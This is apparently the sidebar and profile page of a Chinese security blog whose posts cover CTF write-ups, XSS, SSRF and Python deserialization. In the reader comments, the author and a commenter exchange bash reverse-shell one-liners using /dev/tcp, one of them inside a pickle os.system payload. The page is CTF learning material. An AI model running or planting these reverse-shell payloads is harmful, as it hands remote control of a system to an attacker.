会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
vstar_o
博客园
首页
新随笔
联系
订阅
管理
随笔 - 29
文章 - 7
评论 - 6
阅读 -
9288
阅读排行榜
1
2
3
4
5
6
下一页
buuctf web write-up
vstar_o 2020-03-31 23:29
阅读(855)
评论(0)
推荐(0)
编辑
Python反序列化漏洞
vstar_o 2020-07-31 20:27
阅读(770)
评论(6)
推荐(0)
编辑
[HITCON 2017]SSRFme
vstar_o 2020-08-19 11:29
阅读(608)
评论(0)
推荐(1)
编辑
xss 19道题目
vstar_o 2020-08-18 22:26
阅读(568)
评论(0)
推荐(0)
编辑
组网 命令
vstar_o 2020-12-20 22:11
阅读(480)
评论(0)
推荐(0)
编辑
1
2
3
4
5
6
下一页
公告
首页
联系
订阅
管理
找找看
积分排名
最新随笔
我的标签
随笔分类
文章分类
阅读排行
推荐排行
最新评论
文章档案
随笔档案
Close Menu
MENU
Scroll Down
昵称:
vstar_o
园龄:
4年10个月
粉丝:
2
关注:
3
+加关注
<
2025年2月
>
日
一
二
三
四
五
六
26
27
28
29
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
1
2
3
4
5
6
7
8
搜索
常用链接
我的随笔
我的评论
我的参与
最新评论
我的标签
随笔档案
2021年1月(3)
2020年12月(1)
2020年10月(3)
2020年9月(4)
2020年8月(6)
2020年7月(2)
2020年6月(2)
2020年5月(1)
2020年4月(4)
2020年3月(3)
阅读排行榜
1. buuctf web write-up(855)
2. Python反序列化漏洞(770)
3. [HITCON 2017]SSRFme(608)
4. xss 19道题目(568)
5. 组网 命令(479)
评论排行榜
1. Python反序列化漏洞(6)
推荐排行榜
1. [HITCON 2017]SSRFme(1)
2. xss lab注入(1)
最新评论
1. Re:Python反序列化漏洞
@qtfynokia 已经更新了,语句应该是“bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1'”,bash -c的意思是将后面的字符串作为...
--vstar_o
2. Re:Python反序列化漏洞
按你的写法,是不是应该写成: return (os.system,("bash -c","-i >& /dev/tcp/XXX/12345 0<&1 2>&1")),但是我试了下有报错。然后也不明白为...
--qtfynokia
3. Re:Python反序列化漏洞
@qtfynokia 噢是的,感谢指正...
--vstar_o
4. Re:Python反序列化漏洞
这里有3个“,应该是笔误吧?
--qtfynokia
5. Re:Python反序列化漏洞
@qtfynokia 你觉得是哪里出问题了呢...
--vstar_o
点击右上角即可分享
❄